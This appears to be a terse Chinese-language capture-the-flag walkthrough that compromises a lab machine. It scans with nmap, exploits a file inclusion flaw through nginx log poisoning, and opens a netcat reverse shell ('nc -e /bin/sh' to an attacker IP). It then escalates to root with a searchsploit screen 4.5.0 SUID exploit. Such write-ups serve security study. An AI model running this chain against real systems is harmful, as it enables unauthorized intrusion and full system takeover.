先找到靶机
然后扫一下
nmap -sP 192.168.0.0/24
nmap -sV 192.168.0.149
发现底下的年份一直再变,怀疑文件包含漏洞
写个phpinfo试一下
返回phpinfo页面
成功
<?php phpinfo();?>
监听端口
nc建立连接
nc -nlvp 4444
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/sh 192.168.0.128 4444
http://192.168.0.149/thankyou.php?file=/var/log/nginx/access.log
查看root权限
发现screen-4.5.0
find / -perm -u=s -type f 2>/dev/null
找一下漏洞
searchsploit screen 4.5
打开41154.txt,根据提示做出3个文件
打开apache,准备wget传输文件
/etc/init.d/apache2 start
下载文件之前建立反射shell
python -c 'import pty;pty.spawn("/bin/bash")'
wget 文件名
利用文件
忘了截图了,偷一张~
./rootshell
拿到flag!!!